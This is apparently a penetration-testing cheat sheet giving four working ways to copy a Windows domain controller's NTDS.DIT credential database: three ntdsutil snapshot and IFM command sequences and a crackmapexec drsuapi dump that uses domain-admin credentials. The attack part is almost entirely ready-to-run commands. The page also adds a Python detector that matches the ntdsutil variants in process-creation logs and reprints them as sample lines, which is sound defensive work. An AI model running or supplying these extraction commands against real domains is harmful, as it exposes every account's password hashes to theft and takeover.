Internal Infrastructure Pentest - Extracting NTDS.DIT File
Method1:
ntdsutil snapshot "activate instance ntds" create quit quit
ntdsutil snapshot "mount {GUID}" quit quit
copy "MOUNT_POINT\windows\ntds\ntds.dit" "c:\temp\ntds.dit"
ntdsutil snapshot "unmount {GUID}" "delete {GUID}" quit quit
Method2:
C:\>ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit
Method3:
ntdsutil "ac in ntds" "ifm" "cr fu c:\temp" q q
Method4:
crackmapexec.py -u DA_USERNAME -p DA_PASSWORD -d FQDN_DOMAIN DOMAIN_IP --ntds drsuapi
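
Detection side of Methods 1 to 3, as an added example that is not part of the original page: a matcher for process-creation command lines (such as Windows Security event 4688 with command-line auditing, or Sysmon event 1) that recognises the ntdsutil snapshot and IFM invocations above, including short forms like those in Method 3. The function names, reason strings and sample lines are constructed for illustration, and treating any prefix of two or more characters as a short form is an assumption generalised from Method 3. Method 4 runs remotely over drsuapi and leaves no ntdsutil command line to match.

```python
import re

MIN_ABBR = 2  # assumption: shortest short form worth matching ("ac", "cr", "fu")

def _abbr(tok, word):
    """True if tok equals word or is a prefix of it, like Method 3's short forms."""
    return len(tok) >= MIN_ABBR and word.startswith(tok)

def _has_phrase(tokens, words):
    """True if consecutive tokens match consecutive words, short forms allowed."""
    n = len(words)
    return any(all(_abbr(t, w) for t, w in zip(tokens[i:i + n], words))
               for i in range(len(tokens) - n + 1))

def classify(cmdline):
    """Return a reason string if the command line matches Methods 1-3, else None."""
    lowered = cmdline.lower()
    tokens = re.findall(r'[^\s"]+', lowered)
    if not tokens:
        return None
    image = re.sub(r"\.exe$", "", tokens[0].rsplit("\\", 1)[-1])
    if image != "ntdsutil":
        return "ntds.dit path referenced" if "ntds.dit" in lowered else None
    args = tokens[1:]
    if not args:  # Method 2: subcommands are typed at the prompt and never logged
        return "interactive ntdsutil session"
    if _has_phrase(args, ["ifm"]) and _has_phrase(args, ["create", "full"]):
        return "ntdsutil ifm create full"
    if _has_phrase(args, ["snapshot"]) and (
            _has_phrase(args, ["create"]) or _has_phrase(args, ["mount"])):
        return "ntdsutil snapshot create/mount"
    return None

# Constructed process-creation command lines (not captured from a real host).
SAMPLE = [
    r'ntdsutil snapshot "activate instance ntds" create quit quit',
    r'C:\Windows\System32\ntdsutil.exe "ac in ntds" "ifm" "cr fu c:\temp" q q',
    r'ntdsutil',
    r'cmd.exe /c copy "MOUNT_POINT\windows\ntds\ntds.dit" "c:\temp\ntds.dit"',
    r'ntdsutil "activate instance ntds" "files" "info" q q',
]

def scan(cmdlines):
    """Return (command line, reason) for every line that matches."""
    return [(c, r) for c in cmdlines if (r := classify(c))]

if __name__ == "__main__":
    for cmd, reason in scan(SAMPLE):
        print(f"{reason:32} {cmd}")
```

The bare `ntdsutil` hit is low confidence by itself, because the interactive session in Method 2 never puts its subcommands on a command line; pair it with file-creation telemetry for ntds.dit copies on the domain controller.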